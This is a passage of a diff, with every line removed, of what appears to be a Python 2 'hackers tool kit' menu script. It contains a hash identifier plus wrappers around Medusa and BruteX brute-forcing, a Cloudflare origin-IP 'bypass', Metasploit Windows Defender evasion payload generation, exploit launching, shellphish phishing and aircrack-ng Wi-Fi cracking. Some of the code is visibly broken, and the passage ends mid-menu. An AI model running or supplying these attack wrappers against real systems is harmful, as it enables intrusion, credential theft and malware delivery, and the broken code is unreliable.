if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": 